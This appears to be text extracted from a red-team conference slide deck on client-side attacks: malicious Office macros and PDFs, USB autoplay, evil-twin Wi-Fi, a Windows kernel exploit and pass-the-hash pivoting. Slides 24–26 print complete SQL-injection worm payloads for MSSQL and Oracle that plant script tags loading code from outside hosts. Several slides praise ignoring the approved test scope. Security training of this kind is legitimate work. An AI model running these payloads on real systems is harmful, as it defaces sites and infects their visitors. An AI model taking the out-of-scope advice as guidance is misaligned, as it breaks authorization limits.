The document discusses various client-side attack techniques, including exploiting Microsoft Office macros and malicious PDF files to execute code on targets' machines. It also covers USB-based attacks, SQL injection worms, and wireless evil twin attacks. The speaker advocates using "black hat" tactics like these during penetration tests to think outside the box and effectively compromise systems. An example operation called "CloudBurst" is described that starts with client-side attacks and pivots to a local kernel exploit and internal pass-the-hash attacks to fully compromise the target network.

1. Tactical Assassins : Client-Side OWNage
Prathan Phongthiproek
ACIS Professional Center
Senior Information Security Consultant

2. Who am I ?!
 Instructor / Speaker
 Red Team : Penetration Tester (Team Leader)
 Security Consultant / Researcher
 CWH Underground
 Exploits and Vulnerabilities Disclosure
 Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc

3. Let’s Talk!
 Attack Layer 8: Client-Side OWNage
 MS Office (Evil Macro)
 Malicious Adobe PDF
 Malicious USB
 One-Click Attack
 Evil-Twin Attack!
 Built-in Pen-Test Tactics
 Black Hat versus White Hat
 Using Black Hat styles to Compromise system
 Operation CloudBurst

4. Client-Side OWNage
The Way to Attack Layer 8!

5. MS Office (Evil Macro)!
 MS Office is Evil !!

6. MS Office (Evil Macro)!

7. MS Office (Evil Macro)!

8. MS Office (Evil Macro)!

9. Malicious Adobe PDF!

10. Malicious Adobe PDF!

11. Malicious Adobe PDF!

12. Malicious Adobe PDF!

13. Malicious Adobe PDF!
Malicious PDF File

14. Malicious Adobe PDF!

15. Malicious Adobe PDF!

16. Malicious USB!
 Autoplay NOT Autorun

17. Malicious USB!
 Turn Off Autoplay -> It’s still vulnerable from evil usb

18. Malicious USB!

19. Malicious USB!

20. Malicious USB!
0xff
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer

21. Malicious USB!

22. One-Click Attack!

23. One-Click Attack!

24. One-Click Attack!
 SQL Injection Worms - MSSQL!
 ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0x4400450043004C004100520045002000400054002000760061
0072006300680061007200280032003500350029002C004000430
02000760061007200630068006100720028003200350035002900
20004400450043004C0041005200450020005400610062006C00
65005F0043007500720073006F007200200043005500520053004
F005200200046004F0052002000730065006C006500630074002
00061002E006E0061006D0065002C0062002E006E0061006D00
65002000660072006F006D0020007300790073006F0062006A00
6500630074007300200061002C0073007900730063006F006C00
75006D006E007300200062002000770068006500720065002000
61002E00690064003D0062002E0069006400200061006E006400
200061002E00780074007900700065003D002700750027002000
61006E0064002000280062002E00780074007900700065003D00
3900390020006F007200200062002E00780074007900700065003
D003300350020006F007200200062002E0078007400790070006
5003D0032003300310020006F007200200062002E00780074007
900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--

25. One-Click Attack!
 SQL Injection Worms - MSSQL!
 ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2
5 5 ) D E C LAR E T a b l e _ C u r s o r C U R S O R F O R
select a.name,b.name from sysobjects a,
syscolumns b where a.id=b.id and a.xtyp
e='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) OPEN Table
_Cursor FETCH NEXT FROM Table_Curs
o r I NTO @T, @ C W H I LE ( @ @ F ETC H _ STATU
S=0) BEGIN exec('update ['+@T+'] set ['
+@C+']=rtrim(convert(varchar,['+@C+']))
+''<script src=http://www.fengnima.cn/k.j
s></script>''')FETCH NEXT FROM Table_
Cursor INTO @T,@C END CLOSE Table_C
u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS
%20NVARCHAR(4000));EXEC(@S);--

26. One-Click Attack!
 SQL Injection Worms - Oracle!
 http://127.0.0.1:81/ora4.php?name=1 and 1=(select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
begin execute immediate '''''''' alter session set current_schema=SCOTT '''''''';
execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||
chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||
chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||
chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||
chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||
chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||
chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr
(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||
chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM
ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME =
C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr
(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr
(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE
IMMEDIATE rec.foo;end loop;execute immediate
''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--

27. One-Click Attack!

28. One-Click Attack!

29. One-Click Attack!

30. One-Click Attack!

31. One-Click Attack!
Link to Malicious Website
Reverse Shell to Attackers

32. One-Click Attack!

33. Evil-Twin Attack!
 Karma + Metasploit = Karmetasploit !!
 Rouge Access Point (Evil Twin): Steal usernames,
passwords and information from public wireless
hotspots
 Why we don’t steal something evil like credit card
(Pay to Play) ??

34. Evil-Twin Attack!

35. Evil-Twin Attack!

36. Evil-Twin Attack!

37. Built-in Pen-Test Tactics!

38. Black Hat versus White Hat!
 Thinking Outside of the Box  Thinking Inside the box
 Know one piece of information  Assigned Limited block of IP
and have to expand from there address
 Compromise all system and  Unable to go beyond the scope
Target Attack of approved list, Only touch xyz
hosts, Don’t touch abc host.
 All Methodologies was Integrate  Follow Pen-Test Methodologies;
OSSTMM, NIST, ISSAF
 Download Exploit from Milw0rm,
 Manual Foot printing, No noisy Exploit with Core Impact,
scan, Just Nmap and 0-Day CANVAS, Metasploit
Attack
 Oops, I cannot hack user.
 Attack Layer 8 :Client-Side
OWNage

39. Using Black Hat styles to Compromise
system
 Pen-Tester Must “Thinking outside of the box”
 Attack Layer 8 : More effective result
 Pen-Test with Black Hat styles
 Using Black Hat Mind
 Email Address Enumeration
 Social Networking (Maltego)
 Social Engineering (Adobe PDF, Evil Macro, One-Click
Attack, IE Aurora, etc)
 Information Gathering All subdomain
 xyz.victim.com, abc.victim.com, 123.victim.com
 Blind Test, Compromise all system and Target Attack

40. Using Black Hat styles to Compromise
system

41. Operation CloudBurst!

42. KiTra0d – Local Ring0 Kernel Exploit
 MS Windows NT #GP Trap Handler Allows Users to Switch Kernel
Stack
 Affect every release of the Windows NT kernel (Window 2000, XP,
Server 2003, Vista, Server 2008, 7)
 Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit,
Itanium)
 Patch release MS10-015 on Feb 09 2010 Get The Hell
Outta Here !!
 0-day for 1 month. W00t ! W00t !

43. KiTra0d – Local Ring0 Kernel Exploit

44. Token Kidnapping – Elevate Privilege
 Token - Web Cookies
 On Windows XP / 2003 – Windows Service run as SYSTEM account
 Compromise of a Service == Full System Compromise
 On Windows Vista / 2008 - LocalService / NetworkService == System
 Affect every release of the Windows NT kernel (Window 2000, XP,
Server 2003, Vista, Server 2008, 7)
 Patch release MS09-012 on April 14 2009
 0-day for 1 year. W00t ! W00t !!
 Black hat Mind !!
 Combine Attack Layer 8 + KiTrap0d + Token Kidnapping

45. Operation CloudBurst
 Start Mission with Attack Layer 8
 SPAM Mail / 1-Click Ownage
 Reverse Shell to Attacker
 KiTrap0D – The Message From Slave to God
 0-Day Ring0 xpl, All Windows OS
 Maintain Access
 Pivot (Tunneling), Backdoor Position
 Compromise All System and Domain Controller
 Impersonate Token, Pass-The-Hash Attack

46. Operation CloudBurst!
Intranet
Reverse Shell connection to Attacker
Internet
Attack Network – Passthehash, KiTrap0d XPL
impersonate Token Pivot Network – Route Add

48. If someone is still in the room.. Q&A!
THANK YOU!